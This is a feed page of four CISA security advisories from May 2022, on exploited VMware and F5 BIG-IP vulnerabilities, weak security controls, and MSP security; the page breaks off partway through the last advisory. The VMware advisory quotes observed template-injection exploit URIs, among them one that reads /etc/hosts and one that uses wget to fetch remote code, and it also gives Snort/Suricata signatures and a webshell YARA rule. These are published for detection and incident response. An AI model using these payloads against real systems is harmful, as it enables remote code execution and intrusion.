Feed aggregator

AA22-138B: Threat Actors Chaining Unpatched VMware Vulnerabilities for Full System Control

US-CERT Security Alerts - Wed, 05/18/2022 - 10:00
Original release date: May 18, 2022 | Last revised: May 19, 2022
Summary

The Cybersecurity and Infrastructure Security Agency (CISA) is releasing this Cybersecurity Advisory (CSA) to warn organizations that malicious cyber actors, likely advanced persistent threat (APT) actors, are exploiting CVE-2022-22954 and CVE-2022-22960 separately and in combination. These vulnerabilities affect certain versions of VMware Workspace ONE Access, VMware Identity Manager (vIDM), VMware vRealize Automation (vRA), VMware Cloud Foundation, and vRealize Suite Lifecycle Manager. Exploiting these vulnerabilities permits malicious actors to trigger a server-side template injection that may result in remote code execution (RCE) (CVE-2022-22954) or escalation of privileges to root (CVE-2022-22960). 

VMware released updates for both vulnerabilities on April 6, 2022, and, according to a trusted third party, malicious cyber actors were able to reverse engineer the updates to develop an exploit within 48 hours and quickly began exploiting the disclosed vulnerabilities in unpatched devices. CISA was made aware of this exploit a week later and added CVE-2022-22954 and CVE-2022-22960 to its catalog of Known Exploited Vulnerabilities on April 14 and April 15, respectively. In accordance with Binding Operational Directive (BOD) 22-01, Reducing the Significant Risk of Known Exploited Vulnerabilities, federal agencies were required to apply updates for CVE-2022-22954 and CVE-2022-22960 by May 5, and May 6, 2022, respectively

Note: based on this activity, CISA expects malicious cyber actors to quickly develop a capability to exploit newly released vulnerabilities CVE-2022-22972 and CVE-2022-22973 in the same impacted VMware products. In response, CISA has released, Emergency Directive (ED) 22-03 Mitigate VMware Vulnerabilities, which requires emergency action from Federal Civilian Executive Branch agencies to either immediately implement the updates in VMware Security Advisory VMSA-2022-0014 or remove the affected software from their network until the updates can be applied.

CISA has deployed an incident response team to a large organization where the threat actors exploited CVE-2022-22954. Additionally, CISA has received information—including indicators of compromise (IOCs)—about observed exploitation at multiple other large organizations from trusted third parties.

This CSA provides IOCs and detection signatures from CISA as well as from trusted third parties to assist administrators with detecting and responding to this activity. Due to the rapid exploitation of these vulnerabilities, CISA strongly encourages all organizations with affected VMware products that are accessible from the internet—that did not immediately apply updates—to assume compromise and initiate threat hunting activities using the detection methods provided in this CSA. If potential compromise is detected, administrators should apply the incident response recommendations included in this CSA.. If potential compromise is detected, administrators should apply the incident response recommendations included in this CSA.

Download the PDF version of this report (pdf, 232kb).

For a downloadable copy of IOCs, see AA22-138B.stix

Technical Details

CISA has deployed an incident response team to a large organization where the threat actors exploited CVE-2022-22954. Additionally, CISA has received information about observed exploitation of CVE-2022-22954 and CVE-2022-22960 by multiple threat actors at multiple other large organizations from trusted third parties.

  • CVE-2022-22954 enables an actor with network access to trigger a server-side template injection that may result in RCE. This vulnerability affects the following products:[1]
    • VMware Workspace ONE Access, versions 21.08.0.1, 21.08.0.0, 20.10.0.1, 20.10.0.0
    • vIDM versions 3.3.6, 3.3.5, 3.3.4, 3.3.3
    • VMware Cloud Foundation, 4.x
    • vRealize Suite LifeCycle Manager, 8.
  • CVE-2022-22960 enables a malicious actor with local access to escalate privileges to root due to improper permissions in support scripts. This vulnerability affects the following products:[2]
    • VMware Workspace ONE Access, versions 21.08.0.1, 21.08.0.0, 20.10.0.1, 20.10.0.0
    • vIDM, versions 3.3.6, 3.3.5, 3.3.4, 3.3.3
    • vRA, version 7.6 
    • VMware Cloud Foundation, 3.x, 4.x, 
    • vRealize Suite LifeCycle Manager, 8.x

According to trusted third-party reporting, threat actors may chain these vulnerabilities. At one compromised organization, on or around April 12, 2022, an unauthenticated actor with network access to the web interface leveraged CVE-2022-22954 to execute an arbitrary shell command as a VMware user. The actor then exploited CVE-2022-22960 to escalate the user’s privileges to root. With root access, the actor could wipe logs, escalate permissions, and move laterally to other systems.

Threat actors have dropped post-exploitation tools, including the Dingo J-spy webshell. During incident response activities, CISA observed, on or around April 13, 2022, threat actors leveraging CVE-2022-22954 to drop the Dingo J-spy webshell. Around the same period, a trusted third party observed threat actors leveraging CVE-2022-22954 to drop the Dingo J-spy webshell at one other organization. According to the third party, the actors may have also dropped the Dingo J-spy webshell at a third organization. Note: analysis of the first compromise and associated malware is ongoing, and CISA will update information about this case as we learn more.

Detection Methods Signatures

Note: servers vulnerable to CVE-2022-22954 may use Hypertext Transfer Protocol Secure (HTTPS) to encrypt client/server communications. Secure Sockets Layer (SSL)/Transport Layer Security (TLS) decryption can be used as a workaround for network-based detection and threat hunting efforts.

The following CISA-created Snort signature may detect malicious network traffic related to exploitation of CVE-2022-22954:

alert tcp any any -> any $HTTP_PORTS (msg:"VMware:HTTP GET URI contains '/catalog-portal/ui/oauth/verify?error=&deviceUdid=':CVE-2022-22954"; sid:1; rev:1; flow:established,to_server; content: "GET"; http_method; content:"/catalog-portal/ui/oauth/verify?error=&deviceUdid="; http_uri; reference:cve,2022-22954; reference:url,github.com/sherlocksecurity/VMware-CVE-2022-22954; reference:url,github.com/tunelko/CVE-2022-22954-PoC/blob/main/CVE-2022-22954.py; priority:2; metadata:service http;)

The following third-party Snort signature may detect exploitation of VMware Workspace ONE Access server-side template injection:

10000001alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"Workspace One Serverside Template Injection";content:"GET"; http_method; content:"freemarker.template.utility.Execute";nocase; http_uri; priority:1; sid:;rev:1;)

The following third-party YARA rule may detect unmodified instances of the Dingo J-spy webshell on infected hosts:

rule dingo_jspy_webshell
{
strings:
$string1 = "dingo.length"
$string2 = "command = command.trim"
$string3 = "commandAction"
$string4 = "PortScan"
$string5 = "InetAddress.getLocalHost"
$string6 = "DatabaseManager"
$string7 = "ExecuteCommand"
$string8 = "var command = form.command.value"
$string9 = "dingody.iteye.com"
$string10 = "J-Spy ver"
$string11 = "no permission ,die"
$string12 = "int iPort = Integer.parseInt"
condition:
filesize < 50KB and 12 of ($string*)
}

Note: the Dingo J-spy webshell is an example of post-exploitation tools that actors have used. Administrators should examine their network for any sign of post-exploitation activity.

Behavioral Analysis and Indicators of Compromise

Administrators should conduct behavioral analysis on root accounts of vulnerable systems by:

  • Using the indicators listed in table 1 to detect potential malicious activity.
  • Reviewing systems logs and gaps in logs.
  • Reviewing abnormal connections to other assets.
  • Searching the command-line history.
  • Auditing running processes.
  • Reviewing local user accounts and groups.  
  • Auditing active listening ports and connections.

 

Table 1: Third-party IOCs for Exploitation of CVE-2022-22954 and CVE-2022-22960

Indicator

Comment

IP Addresses

136.243.75[.]136

On or around April 12, 2022, malicious cyber actors may have used this German-registered IP address to conduct the activity. However, the actors may have used the Privax HMA VPN client to conduct operations.

Scanning, Exploitation Strings, and Commands Observed

catalog-portal/ui/oauth/verify 

 

catalog

portal/ui/oauth/verify?error=&deviceUdid=${"freemarker.template.utility.Execute"?new()("cat  /etc/hosts")}  

 

/catalog

portal/ui/oauth/verify?error=&deviceUdid=${"freemarker.template.utility.Execute"?new()("wget  -U "Hello 1.0" -qO - http://[REDACTED]/one")} 

 

freemarker.template.utility.Execute

Search for this function in:

opt/vmware/horizon/workspace/logs/greenbox_web.log.

 

freemarker.template.utility.Execute may be legitimate but could also indicate malicious shell commands.

/opt/vmware/certproxy/bing/certproxyService.sh 

Check for this command being placed into the script; CVE-2022-22960 allows a user to write to it and be executed as root.

/horizon/scripts/exportCustomGroupUsers.sh

Check for this command being placed into the script; CVE-2022-22960 allows a user to write to it and be executed as root.

/horizon/scripts/extractUserIdFromDatabase.sh 

Check for this command being placed into the script; CVE-2022-22960 allows a user to write to it and be executed as root.

Files

horizon.jsp 

Found in /usr/local/horizon/workspace/webapps/SAAS/horizon/js-lib: 

jquery.jsp

Found in /usr/local/horizon/workspace/webapps/SAAS/horizon/js-lib: 

Webshells

jspy 

 

godzilla  

 

tomcatjsp 

 

Incident Response

If administrators discover system compromise, CISA recommends they:

  1. Immediately isolate affected systems. 
  2. Collect and review relevant logs, data, and artifacts.
  3. Consider soliciting support from a third-party incident response organization to provide subject matter expertise, ensure the actor is eradicated from the network, and avoid residual issues that could enable follow-on exploitation.
  4. Report incidents to CISA via CISA’s 24/7 Operations Center (report@cisa.gov or 888-282-0870)
Mitigations

CISA recommends organizations update impacted VMware products to the latest version or remove impacted versions from organizational networks. CISA does not endorse alternative mitigation options. As noted in ED 22-03 Mitigate VMware Vulnerabilities, CISA expects malicious cyber actors to quickly develop a capability to exploit newly released vulnerabilities CVE-2022-22972 and CVE-2022-22973 in the same impacted VMware products. ED 22-03 directs all Federal Civilian Executive Branch agencies to enumerate all instances of impacted VMware products and deploy updates in VMware Security Advisory VMSA-2022-0014 or to remove the affected software from the agency network until the updates can be applied.

Resources Contact Information

CISA encourages recipients of this CSA to report incidents to CISA via CISA’s 24/7 Operations Center (report@cisa.gov or 888-282-0870)

References Revisions
  • Initial Version: May 18, 2022

This product is provided subject to this Notification and this Privacy & Use policy.

Categories: Security Alerts

AA22-138A: Threat Actors Exploiting F5 BIG-IP CVE-2022-1388

US-CERT Security Alerts - Wed, 05/18/2022 - 05:00
Original release date: May 18, 2022
Summary

Actions for administrators to take today:
• Do not expose management interfaces to the internet.
• Enforce multi-factor authentication.
• Consider using CISA’s Cyber Hygiene Services.

The Cybersecurity and Infrastructure Security Agency (CISA) and the Multi-State Information Sharing & Analysis Center (MS-ISAC) are releasing this joint Cybersecurity Advisory (CSA) in response to active exploitation of CVE-2022-1388. This recently disclosed vulnerability in certain versions of F5 Networks, Inc., (F5) BIG-IP enables an unauthenticated actor to gain control of affected systems via the management port or self-IP addresses. F5 released a patch for CVE-2022-1388 on May 4, 2022, and proof of concept (POC) exploits have since been publicly released, enabling less sophisticated actors to exploit the vulnerability. Due to previous exploitation of F5 BIG-IP vulnerabilities, CISA and MS-ISAC assess unpatched F5 BIG-IP devices are an attractive target; organizations that have not applied the patch are vulnerable to actors taking control of their systems.

According to public reporting, there is active exploitation of this vulnerability, and CISA and MS-ISAC expect to see widespread exploitation of unpatched F5 BIG-IP devices (mostly with publicly exposed management ports or self IPs) in both government and private sector networks. CISA and MS-ISAC strongly urge users and administrators to remain aware of the ramifications of exploitation and use the recommendations in this CSA—including upgrading their software to fixed versions—to help secure their organization’s systems against malicious cyber operations. Additionally, CISA and MS-ISAC strongly encourage administrators to deploy the signatures included in this CSA to help determine whether their systems have been compromised. CISA and MS-ISAC especially encourage organizations who did not patch immediately or whose F5 BIG-IP device management interface has been exposed to the internet to assume compromise and hunt for malicious activity using the detection signatures in this CSA. If potential compromise is detected, organizations should apply the incident response recommendations included in this CSA.

Download the PDF version of this report (pdf, 500kb).

Technical Details

CVE-2022-1388 is a critical iControl REST authentication bypass vulnerability affecting the following versions of F5 BIG-IP:[1]

  • 16.1.x versions prior to 16.1.2.2 
  • 15.1.x versions prior to 15.1.5.1 
  • 14.1.x versions prior to 14.1.4.6 
  • 13.1.x versions prior to 13.1.5 
  • All 12.1.x and 11.6.x versions

An unauthenticated actor with network access to the BIG-IP system through the management port or self IP addresses could exploit the vulnerability to execute arbitrary system commands, create or delete files, or disable services. F5 released a patch for CVE-2022-1388 for all affected versions—except 12.1.x and 11.6.x versions—on May 4, 2022 (12.1.x and 11.6.x versions are end of life [EOL], and F5 has stated they will not release patches).[2]

POC exploits for this vulnerability have been publicly released, and on May 11, 2022, CISA added this vulnerability its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation. Due to the POCs and ease of exploitation, CISA and MS-ISAC expect to see widespread exploitation of unpatched F5 BIG-IP devices in government and private networks. 

Dection Methods

CISA recommends administrators, especially of organizations who did not immediately patch, to:

  • See the F5 Security Advisory K23605346 for indicators of compromise. 
  • See the F5 guidance K11438344 if you suspect a compromise. 
  • Deploy the following CISA-created Snort signature:
alert tcp any any -> any $HTTP_PORTS (msg:”BIG-IP F5 iControl:HTTP POST URI ‘/mgmt./tm/util/bash’ and content data ‘command’ and ‘utilCmdArgs’:CVE-2022-1388”; sid:1; rev:1; flow:established,to_server; flowbits:isnotset,bigip20221388.tagged; content:”POST”; http_method; content:”/mgmt/tm/util/bash”; http_uri; content:”command”; http_client_body; content:”utilCmdArgs”; http_client_body; flowbits:set,bigip20221388.tagged; tag:session,10,packets; reference:cve-2022-1388; reference:url,github.com/alt3kx/CVE-2022-1388_PoC; priority:2; metadata:service http;)

Additional resources to detect possible exploitation or compromise are identified below:

  • Emerging Threats suricata signatures. Note: CISA and MS-ISAC have verified these signatures are successful in detection of both inbound exploitation attempts (SID: 2036546) as well as post exploitation, indicating code execution (SID: 2036547).
    • SID 2036546
alert http $HOME_NET any -> $EXTERNAL_NET any (msg:"ET EXPLOIT F5 BIG-IP iControl REST Authentication Bypass (CVE 2022-1388) M1"; flow:established,to_server; content:"POST"; http_method; content:"/mgmt/tm/util/bash"; http_uri; fast_pattern; content:"Authorization|3a 20|Basic YWRtaW46"; http_header; content:"command"; http_client_body; content:"run"; http_client_body; distance:0; content:"utilCmdArgs"; http_client_body; distance:0; http_connection; content:"x-F5-Auth-Token"; nocase; http_header_names; content:!"Referer"; content:"X-F5-Auth-Token"; flowbits:set,ET.F5AuthBypass; reference:cve,2022-1388; classtype:trojan-activity; sid:2036546; rev:2; metadata:attack_target Web_Server, created_at 2022_05_09, deployment Perimeter, deployment SSLDecrypt, former_category EXPLOIT, performance_impact Low, signature_severity Major, updated_at 2022_05_09;
  • SID SID 2036547
alert http $HOME_NET any -> any any (msg:"ET EXPLOIT F5 BIG-IP iControl REST Authentication Bypass Server Response (CVE 2022-1388)"; flow:established,to_client; flowbits:isset,ET.F5AuthBypass; content:"200"; http_stat_code; file_data; content:"kind"; content:"tm|3a|util|3a|bash|3a|runstate"; fast_pattern; distance:0; content:"command"; distance:0; content:"run"; distance:0; content:"utilCmdArgs"; distance:0; content:"commandResult"; distance:0; reference:cve,2022-1388; classtype:trojan-activity; sid:2036547; rev:1; metadata:attack_target Web_Server, created_at 2022_05_09, deployment Perimeter, deployment SSLDecrypt, former_category EXPLOIT, performance_impact Low, signature_severity Major, updated_at 2022_05_09;)

 

Incident Response 

If an organization’s IT security personnel discover system compromise, CISA and MS-ISAC recommend they:

  1. Quarantine or take offline potentially affected hosts.
  2. Reimage compromised hosts.
  3. Provision new account credentials.
  4. Limit access to the management interface to the fullest extent possible.
  5. Collect and review artifacts such as running processes/services, unusual authentications, and recent network connections.
  6. Report the compromise to CISA via CISA’s 24/7 Operations Center (report@cisa.gov or 888-282-0870). State, local, tribal, or territorial government entities can also report to MS-ISAC (SOC@cisecurity.org or 866-787-4722).

See the joint CSA from the cybersecurity authorities of Australia, Canada, New Zealand, the United Kingdom, and the United States on Technical Approaches to Uncovering and Remediating Malicious Activity for additional guidance on hunting or investigating a network, and for common mistakes in incident handling. CISA and MS-ISAC also encourage government network administrators to see CISA’s Federal Government Cybersecurity Incident and Vulnerability Response Playbooks. Although tailored to federal civilian branch agencies, these playbooks provide operational procedures for planning and conducting cybersecurity incident and vulnerability response activities and detail steps for both incident and vulnerability response. 

Mitigations

CISA and MS-ISAC recommend organizations:

  • Upgrade F5 BIG-IP software to fixed versions; organizations using versions 12.1.x and 11.6.x should upgrade to supported versions. 
  • If unable to immediately patch, implement F5’s temporary workarounds:
    • Block iControl REST access through the self IP address.
    • Block iControl REST access through the management interface.
    • Modify the BIG-IP httpd configuration. 

See F5 Security Advisory K23605346 for more information on how to implement the above workarounds. 

CISA and MS-ISAC also recommend organizations apply the following best practices to reduce risk of compromise:

  • Maintain and test an incident response plan.
  • Ensure your organization has a vulnerability program in place and that it prioritizes patch management and vulnerability scanning. Note: CISA’s Cyber Hygiene Services (CyHy) are free to all SLTT organizations and public and private sector critical infrastructure organizations: https://www.cisa.gov/cyber-hygiene-services.
  • Properly configure and secure internet-facing network devices.
    • Do not expose management interfaces to the internet.
    • Disable unused or unnecessary network ports and protocols.
    • Disable/remove unused network services and devices.
  • Adopt zero-trust principles and architecture, including:
    • Micro-segmenting networks and functions to limit or block lateral movements.
    • Enforcing multifactor authentication (MFA) for all users and VPN connections.
    • Restricting access to trusted devices and users on the networks.
References Revisions
  • Initial Version: May 18, 2022

This product is provided subject to this Notification and this Privacy & Use policy.

Categories: Security Alerts

AA22-137A: Weak Security Controls and Practices Routinely Exploited for Initial Access

US-CERT Security Alerts - Tue, 05/17/2022 - 05:00
Original release date: May 17, 2022
Summary

Best Practices to Protect Your Systems:
• Control access.
• Harden Credentials.
• Establish centralized log management.
• Use antivirus solutions.
• Employ detection tools.
• Operate services exposed on internet-accessible hosts with secure configurations.
• Keep software updated.

Cyber actors routinely exploit poor security configurations (either misconfigured or left unsecured), weak controls, and other poor cyber hygiene practices to gain initial access or as part of other tactics to compromise a victim’s system. This joint Cybersecurity Advisory identifies commonly exploited controls and practices and includes best practices to mitigate the issues. This advisory was coauthored by the cybersecurity authorities of the United States,[1],[2],[3] Canada,[4] New Zealand,[5],[6] the Netherlands,[7] and the United Kingdom.[8]

Download the PDF version of this report (pdf, 430kb).

Technical Details

Malicious actors commonly use the following techniques to gain initial access to victim networks.[TA0001]

Malicious cyber actors often exploit the following common weak security controls, poor configurations, and poor security practices to employ the initial access techniques.

  • Multifactor authentication (MFA) is not enforced. MFA, particularly for remote desktop access, can help prevent account takeovers. With Remote Desktop Protocol (RDP) as one of the most common infection vector for ransomware, MFA is a critical tool in mitigating malicious cyber activity. Do not exclude any user, particularly adminstrators, from an MFA requirement. 
  • Incorrectly applied privileges or permissions and errors within access control lists. These mistakes can prevent the enforcement of access control rules and could allow unauthorized users or system processes to be granted access to objects. 
  • Software is not up to date. Unpatched software may allow an attacker to exploit publicly known vulnerabilities to gain access to sensitive information, launch a denial-of-service attack, or take control of a system. This is one of the most commonly found poor security practices.
  • Use of vendor-supplied default configurations or default login usernames and passwords. Many software and hardware products come “out of the box” with overly permissive factory-default configurations intended to make the products user-friendly and reduce the troubleshooting time for customer service. However, leaving these factory default configurations enabled after installation may provide avenues for an attacker to exploit. Network devices are also often pre-configured with default administrator usernames and passwords to simplify setup. These default credentials are not secure—they may be physically labeled on the device or even readily available on the internet. Leaving these credentials unchanged creates opportunities for malicious activity, including gaining unauthorized access to information and installing malicious software. Network defenders should also be aware that the same considerations apply for extra software options, which may come with preconfigured default settings.
  • Remote services, such as a virtual private network (VPN), lack sufficient controls to prevent unauthorized access. During recent years, malicious threat actors have been observed targeting remote services. Network defenders can reduce the risk of remote service compromise by adding access control mechanisms, such as enforcing MFA, implementing a boundary firewall in front of a VPN, and leveraging intrusion detection system/intrusion prevention system sensors to detect anomalous network activity.  
  • Strong password policies are not implemented. Malicious cyber actors can use a myriad of methods to exploit weak, leaked, or compromised passwords and gain unauthorized access to a victim system. Malicious cyber actors have used this technique in various nefarious acts and prominently in attacks targeting RDP. 
  • Cloud services are unprotected. Misconfigured cloud services are common targets for cyber actors. Poor configurations can allow for sensitive data theft and even cryptojacking.
  • Open ports and misconfigured services are exposed to the internet. This is one of the most common vulnerability findings. Cyber actors use scanning tools to detect open ports and often use them as an initial attack vector. Successful compromise of a service on a host could enable malicious cyber actors to gain initial access and use other tactics and procedures to compromise exposed and vulnerable entities. RDP, Server Message Block (SMB), Telnet, and NetBIOS are high-risk services. 
  • Failure to detect or block phishing attempts. Cyber actors send emails with malicious macros—primarily in Microsoft Word documents or Excel files—to infect computer systems. Initial infection can occur in a variety of ways, such as when a user opens or clicks a malicious download link, PDF, or macro-enabled Microsoft Word document included in phishing emails. 
  • Poor endpoint detection and response. Cyber actors use obfuscated malicious scripts and PowerShell attacks to bypass endpoint security controls and launch attacks on target devices. These techniques can be difficult to detect and protect against. 
Mitigations

Applying the following practices can help organizations strengthen their network defenses against common exploited weak security controls and practices.

Control Access
  • Adopt a zero-trust security model that eliminates implicit trust in any one element, node, or service, and instead requires continuous verification of the operational picture via real-time information from multiple sources to determine access and other system responses.[9],[10] Zero-trust architecture enables granular privilege access management and can allow users to be assigned only the rights required to perform their assigned tasks.
  • Limit the ability of a local administrator account to log in from a remote session (e.g., deny access to this computer from the network) and prevent access via an RDP session. Additionally, use dedicated administrative workstations for privileged user sessions to help limit exposure to all the threats associated with device or user compromise. 
  • Control who has access to your data and services. Give personnel access only to the data, rights, and systems they need to perform their job. This role-based access control, also known as the principle of least priviledge, should apply to both accounts and physical access. If a malicious cyber actor gains access, access control can limit the actions malicious actors can take and can reduce the impact of misconfigurations and user errors. Network defenders should also use this role-based access control to limit the access of service, machine, and functional accounts, as well as the use of management privileges, to what is necessary. Consider the following when implementing access control models:
    • Ensure that access to data and services is specifically tailored to each user, with each employee having their own user account. 
    • Give employees access only to the resources needed to perform their tasks.
    • Change default passwords of equipment and systems upon installation or commissioning. 
    • Ensure there are processes in place for the entry, exit, and internal movement of employees. Delete unused accounts, and immediately remove access to data and systems from accounts of exiting employees who no longer require access. Deactivate service accounts, and activate them only when maintenance is performed.[11]
  • Harden conditional access policies. Review and optimize VPN and access control rules to manage how users connect to the network and cloud services.
  • Verify that all machines, including cloud-based virtual machine instances do not have open RDP ports. Place any system with an open RDP port behind a firewall and require users to use a VPN to access it through the firewall.[12]
Implement Credential Hardening Establish Centralized Log Management
  • Ensure that each application and system generates sufficient log information. Log files play a key role in detecting attacks and dealing with incidents. By implementing robust log collection and retention, organizations are able to have sufficient information to investigate incidents and detect threat actor behavior. Consider the following when implementing log collection and retention: 
    • Determine which log files are required. These files can pertain to system logging, network logging, application logging, and cloud logging. 
    • Set up alerts where necessary. These should include notifications of suspicious login attempts based on an analysis of log files. 
    • Ensure that your systems store log files in a usable file format, and that the recorded timestamps are accurate and set to the correct time zone. 
    • Forward logs off local systems to a centralized repository or security information and event management (SIEM) tools. Robustly protect SIEM tools with strong account and architectural safeguards.
    • Make a decision regarding the retention period of log files. If you keep log files for a long time, you can refer to them to determine facts long after incidents occur. On the other hand, log files may contain privacy-sensitive information and take up storage space. Limit access to log files and store them in a separate network segment. An incident investigation will be nearly impossible if attackers have been able to modify or delete the logfiles.[13]
Employ Antivirus Programs
  • Deploy an anti-malware solution on workstations to prevent spyware, adware, and malware as part of the operating system security baseline.
  • Monitor antivirus scan results on a routine basis.
Employ Detection Tools and Search for Vulnerabilities
  • Implement endpoint and detection response tools. These tools allow a high degree of visibility into the security status of endpoints and can help effectively protect against malicious cyber actors.
  • Employ an intrusion detection system or intrusion prevention system to protect network and on-premises devices from malicious activity. Use signatures to help detect malicious network activity associated with known threat activity.
  • Conduct penetration testing to identify misconfigurations. See the Additional Resources section below for more information about CISA’s free cyber hygiene services, including remote penetration testing.
  • Conduct vulnerability scanning to detect and address application vulnerabilities. 
  • Use cloud service provider tools to detect overshared cloud storage and monitor for abnormal accesses.
Maintain Rigorous Configuration Management Programs
  • Always operate services exposed on internet-accessible hosts with secure configurations. Never enable external access without compensating controls such as boundary firewalls and segmentation from other more secure and internal hosts like domain controllers. Continuously assess the business and mission need of internet-facing services. Follow best practices for security configurations, especially blocking macros in documents from the internet.[14]
Initiate a Software and Patch Management Program 
  • Implement asset and patch management processes to keep software up to date. Identify and mitigate unsupported, end-of-life, and unpatched software and firmware by performing vulnerability scanning and patching activities. Prioritize patching known exploited vulnerabilities.
Additional Resources  References 

[1] United States Cybersecurity and Infrastructure Security Agency 
[2] United States Federal Bureau of Investigation
[3] United States National Security Agency
[4] Canadian Centre for Cyber Security 
[5] New Zealand National Cyber Security Centre 
[6] New Zealand CERT NZ
[7] Netherlands National Cyber Security Centre
[8] United Kingdom National Cyber Security Centre 
[9] White House Executive Order on Improving the Nation’s Cybersecurity
[10] NCSC-NL Factsheet: Prepare for Zero Trust
[11] NCSC-NL Guide to Cyber Security Measures
[12] N-able Blog: Intrusion Detection System (IDS): Signature vs. Anomaly-Based
[13] NCSC-NL Guide to Cyber Security Measures
[14] National Institute of Standards and Technology SP 800-123 – Keeping Servers Secured

Contact

U.S. organizations: To report incidents and anomalous activity or to request incident response resources or technical assistance related to these threats, contact CISA at report@cisa.gov. To report computer intrusion or cybercrime activity related to information found in this advisory, contact your local FBI field office at www.fbi.gov/contact-us/field, or the FBI’s 24/7 Cyber Watch at 855-292-3937 or by email at CyWatch@fbi.gov. For NSA client requirements or general cybersecurity inquiries, contact Cybersecurity_Requests@nsa.gov

Canadian organizations: report incidents by emailing CCCS at contact@cyber.gc.ca

New Zealand organizations: report cyber security incidents to incidents@ncsc.govt.nz or call 04 498 7654. 

The Netherlands organizations: report incidents to cert@ncsc.nl

United Kingdom organizations: report a significant cyber security incident: ncsc.gov.uk/report-an-incident (monitored 24 hours) or, for urgent assistance, call 03000 200 973.

Caveats

The information you have accessed or received is being provided “as is” for informational purposes only. CISA, the FBI, NSA, CCCS, NCSC-NZ, CERT-NZ, NCSC-NL, and NCSC-UK do not endorse any commercial product or service, including any subjects of analysis. Any reference to specific commercial products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply their endorsement, recommendation, or favoring.

Purpose

This document was developed by CISA, the FBI, NSA, CCCS, NCSC-NZ, CERT-NZ, NCSC-NL, and NCSC-UK in furtherance of their respective cybersecurity missions, including their responsibilities to develop and issue cybersecurity specifications and mitigations. This information may be shared broadly to reach all appropriate stakeholders. 

Revisions
  • May 17, 2022: Initial version

This product is provided subject to this Notification and this Privacy & Use policy.

Categories: Security Alerts

AA22-131A: Protecting Against Cyber Threats to Managed Service Providers and their Customers

US-CERT Security Alerts - Wed, 05/11/2022 - 03:00
Original release date: May 11, 2022
Summary

Tactical actions for MSPs and their customers to take today:
• Identify and disable accounts that are no longer in use.
• Enforce MFA on MSP accounts that access the customer environment and monitor for unexplained failed authentication.
• Ensure MSP-customer contracts transparently identify ownership of ICT security roles and responsibilities.

The cybersecurity authorities of the United Kingdom (NCSC-UK), Australia (ACSC), Canada (CCCS), New Zealand (NCSC-NZ), and the United States (CISA), (NSA), (FBI) are aware of recent reports that observe an increase in malicious cyber activity targeting managed service providers (MSPs) and expect this trend to continue.[1] This joint Cybersecurity Advisory (CSA) provides actions MSPs and their customers can take to reduce their risk of falling victim to a cyber intrusion. This advisory describes cybersecurity best practices for information and communications technology (ICT) services and functions, focusing on guidance that enables transparent discussions between MSPs and their customers on securing sensitive data. Organizations should implement these guidelines as appropriate to their unique environments, in accordance with their specific security needs, and in compliance with applicable regulations. MSP customers should verify that the contractual arrangements with their provider include cybersecurity measures in line with their particular security requirements.

The guidance provided in this advisory is specifically tailored for both MSPs and their customers and is the result of a collaborative effort from the United Kingdom National Cyber Security Centre (NCSC-UK), the Australian Cyber Security Centre (ACSC), the Canadian Centre for Cyber Security (CCCS), the New Zealand National Cyber Security Centre (NCSC-NZ), the United States' Cybersecurity and Infrastructure Security Agency (CISA), National Security Agency (NSA), and Federal Bureau of Investigation (FBI) with contributions from industry members of the Joint Cyber Defense Collaborative (JCDC). Organizations should read this advisory in conjunction with NCSC-UK guidance on actions to take when the cyber threat is heightened, CCCS guidance on Cyber Security Considerations for Consumers of Managed Services, and CISA guidance provided on the Shields Up and Shields Up Technical Guidance webpages.

Managed Service Providers

This advisory defines MSPs as entities that deliver, operate, or manage ICT services and functions for their customers via a contractual arrangement, such as a service level agreement. In addition to offering their own services, an MSP may offer services in conjunction with those of other providers. Offerings may include platform, software, and IT infrastructure services; business process and support functions; and cybersecurity services. MSPs typically manage these services and functions in their customer's network environment—either on the customer's premises or hosted in the MSP's data center. Note: this advisory does not address guidance on cloud service providers (CSPs)—providers who handle the ICT needs of their customers via cloud services such as Software-as-a-Service, Platform-as-a-Service, and Infrastructure-as-a-Service; however, MSPs may offer these services as well. (See Appendix for additional definitions.)

MSPs provide services that usually require both trusted network connectivity and privileged access to and from customer systems. Many organizations—ranging from large critical infrastructure organizations to small- and mid-sized businesses—use MSPs to manage ICT systems, store data, or support sensitive processes. Many organizations make use of MSPs to scale and support network environments and processes without expanding their internal staff or having to develop the capabilities internally. 

Threat Actors Targeting MSP Access to Customer Networks

Whether the customer's network environment is on premises or externally hosted, threat actors can use a vulnerable MSP as an initial access vector to multiple victim networks, with globally cascading effects. The UK, Australian, Canadian, New Zealand, and U.S. cybersecurity authorities expect malicious cyber actors—including state-sponsored advanced persistent threat (APT) groups—to step up their targeting of MSPs in their efforts to exploit provider-customer network trust relationships. For example, threat actors successfully compromising an MSP could enable follow-on activity—such as ransomware and cyber espionage—against the MSP as well as across the MSP's customer base.

The UK, Australian, Canadian, New Zealand, and U.S. cybersecurity authorities have previously issued general guidance for MSPs and their customers.[2],[3],[4],[5],[6],[7],[8] This advisory provides specific guidance to enable transparent, well-informed discussions between MSPs and their customers that center on securing sensitive information and data. These discussions should result in a re-evaluation of security processes and contractual commitments to accommodate customer risk tolerance. A shared commitment to security will reduce risk for both MSPs and their customers, as well as the global ICT community. 

Download the Joint Cybersecurity Advisory: Protecting Against Cyber Threats to Managed Service Providers and their Customers (pdf, 697kb).

Recommendations  MSPs and their Customers

The UK, Australian, Canadian, New Zealand, and U.S. cybersecurity authorities recommend MSPs and their customers implement the baseline security measures and operational controls listed in this section. Additionally, customers should ensure their contractual arrangements specify that their MSP implements these measures and controls.

Prevent initial compromise. 

In their efforts to compromise MSPs, malicious cyber actors exploit vulnerable devices and internet-facing services, conduct brute force attacks, and use phishing techniques. MSPs and their customers should ensure they are mitigating these attack methods. Useful mitigation resources on initial compromise attack methods are listed below:

Enable/improve monitoring and logging processes. 

It can be months before incidents are detected, so UK, Australian, Canadian, New Zealand, and U.S. cybersecurity authorities recommend all organizations store their most important logs for at least six months. Whether through a comprehensive security information and event management (SIEM) solution or discrete logging tools, implement and maintain a segregated logging regime to detect threats to networks. Organizations can refer to the following NCSC-UK guidance on the appropriate data to collect for security purposes and when to use it: What exactly should we be logging? Additionally, all organizations—whether through contractual arrangements with an MSP or on their own—should implement endpoint detection and network defense monitoring capabilities in addition to using application allowlisting/denylisting. 

  • MSPs should log the delivery infrastructure activities used to provide services to the customer. MSPs should also log both internal and customer network activity, as appropriate and contractually agreed upon. 
